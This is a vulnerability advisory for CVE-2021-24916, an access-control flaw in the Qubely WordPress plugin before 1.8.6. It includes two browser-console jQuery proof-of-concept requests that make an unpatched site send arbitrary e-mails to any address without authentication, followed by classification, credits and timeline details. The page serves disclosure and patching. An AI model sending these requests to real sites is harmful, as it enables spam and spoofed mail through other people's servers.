WordPress Plugin Vulnerabilities

Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending

Description

The plugin allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.

Proof of Concept

Execute the below command in the web developer console, on the blog homepage as an unauthenticated user, replacing domain by the domain of the blog:

Current PoC:

jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': '[email protected]', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })


Pre-1.8.5 PoC:


jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('[email protected]'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });

Affects Plugins

Plugin icon
qubely
Fixed in 1.8.6

References

CVE
CVE-2021-24916

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
93b893be-59ad-4500-8edb-9fa7a45304d5

Timeline

Publicly Published
2023-07-17 (about 4 months ago)
Added
2023-07-17 (about 4 months ago)
Last Updated
2023-07-17 (about 4 months ago)

Other

Published
Title
Published
2022-08-01
Title
Duplicator < 1.4.7 - Unauthenticated Backup Download
Published
2021-06-30
Title
Title Field Validation <= 1.1 - Unauthorised AJAX Calls
Published
2020-08-21
Title
Contact Form - Form builder by Kali Forms < 2.1.2 - Unauthenticated Arbitrary Post Deletion
Published
2021-01-28
Title
uListing < 1.7 - Unauthenticated Arbitrary Roles and Capabilities Creation/Deletion
Published
2021-08-02
Title
WP LMS < 1.1.5 - Unauthenticated Arbitrary User Field Edition/Creation